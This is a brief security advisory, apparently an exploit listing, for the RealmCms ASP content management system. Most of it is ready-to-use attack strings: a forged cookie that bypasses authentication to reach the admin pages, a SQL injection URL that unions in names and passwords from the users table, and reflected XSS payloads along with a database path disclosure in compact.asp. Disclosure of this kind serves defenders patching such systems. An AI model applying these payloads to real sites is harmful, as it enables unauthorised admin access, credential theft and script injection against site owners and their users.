# Original Advisory: http://bugreport.ir/index.php?/40

1. Exploits:
    1.1. Attacker can enter to the admin pages by a manipulated cookie.
        -------------
        -Set these cookies: 
            RealmCmsUser=cUserfiles=userFiles&cIntallType=BugReportTeam&cDbLocat=in&cSiteName=www.Bugreport.IR&cFolder=%2Fcms&cUniqueID=db&cUserRole=1&cUserName=Admin&cUserID=20
        -Then go to:
            /_RealmAdmin/login.asp
        -------------
    1.2. SQL Injection in "inc_routines.asp" in "KeyWordsList" function on "kwrd" parameter.
        -------------
        http://[URL]/cmsr/?job=kwl&kwrd=WWW.BugReport.IR' union select name,password from tblusers where name not like '%WWW.BugReport.IR
        -------------
    1.3. Reflected XSS attack, and DB path disclosure in "/cms/_db/compact.asp"
        -------------
        http://[URL]/cms/_db/compact.asp?CmpctedDB=%3Cscript%3Ealert('XSSed by BugReport.IR')%3C/script%3E    (Reflected XSS attack)
        http://[URL]/cms/_db/compact.asp?CmpctedDB=1&Boyut=%3Cscript%3Ealert('XSSed by BugReport.IR')%3C/script%3E    (Reflected XSS attack)
        http://[URL]/cms/_db/compact.asp    (DB path disclosure)
        -------------